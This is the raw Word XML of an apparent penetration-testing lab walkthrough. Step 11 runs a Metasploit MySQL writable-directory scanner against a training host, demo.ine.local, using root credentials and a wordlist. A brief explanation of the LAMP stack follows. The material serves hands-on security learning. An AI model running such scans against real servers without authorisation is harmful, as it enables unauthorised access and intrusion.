            <wp:docPr id="1674169656" name="Picture 3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9656" name="Picture 32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465C" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 11:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> Run the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auxiliary/scanner/mysql/mysql_writable_dirs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209FF0F8" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EC20C1" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>use auxiliary/scanner/mysql/mysql_writable_dirs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B14A9B" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set RHOSTS demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787E284" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1309C35D" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set PASSWORD twinkle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78987F5A" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5AA539" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69812331" w14:textId="2DA3638C" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="009638E6" w:rsidP="00C510F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="702EC9E6" wp14:editId="0FA248F9">
            <wp:extent cx="5943600" cy="3202940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9680760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76007" name="Picture 968076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585F" w14:textId="0A776FC0" w:rsidR="009638E6" w:rsidRDefault="009638E6" w:rsidP="00C510F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06DD29" wp14:editId="55BB0083">
            <wp:extent cx="5943600" cy="1343660"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="868423115" name="Picture 3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3115" name="Picture 34" descr="A black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DDF" w14:textId="3EA449F4" w:rsidR="00C510F6" w:rsidRDefault="00C510F6"/>
    <w:p w14:paraId="4464EB84" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRDefault="00C510F6"/>
    <w:p w14:paraId="581AC981" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRDefault="00C510F6"/>
    <w:p w14:paraId="261F3D51" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6"/>
    <w:p w14:paraId="54711CC1" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRDefault="00C510F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B1FCD1" w14:textId="53E92BF7" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021B6A57" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LAMP stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> is a set of open-source software used together to host and run dynamic websites and web apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CB2AD9" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:t>It stands for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D37BD39" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> (operating system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E62FDF7" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> (web server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5A06E" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MySQL/MariaDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> (database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8828A" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PHP/Python/Perl</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> (programming language for server-side logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D14B528" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRPr="00C510F6" w:rsidRDefault="00C510F6" w:rsidP="00C510F6">
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:t xml:space="preserve"> In short: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C510F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LAMP = a complete environment to develop and run web applications on Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E7DBCC" w14:textId="77777777" w:rsidR="00C510F6" w:rsidRDefault="00C510F6"/>
    <w:sectPr w:rsidR="00C51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487D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD882E9E"/>
    <w:lvl w:ilvl="0" w:tplc="EAF8E6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D546F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE1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319FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90D6C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E2E7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6A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94624">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="933123681">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1561862244">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="11116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E8"/>
    <w:rsid w:val="000A6A19"/>
    <w:rsid w:val="004442D9"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00816BF6"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="009638E6"/>
    <w:rsid w:val="00B3608A"/>
    <w:rsid w:val="00C510F6"/>
    <w:rsid w:val="00D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0DC2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{92E2B0E0-2326-4113-9E96-24DB0FED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2025-10-02T06:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-02T07:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>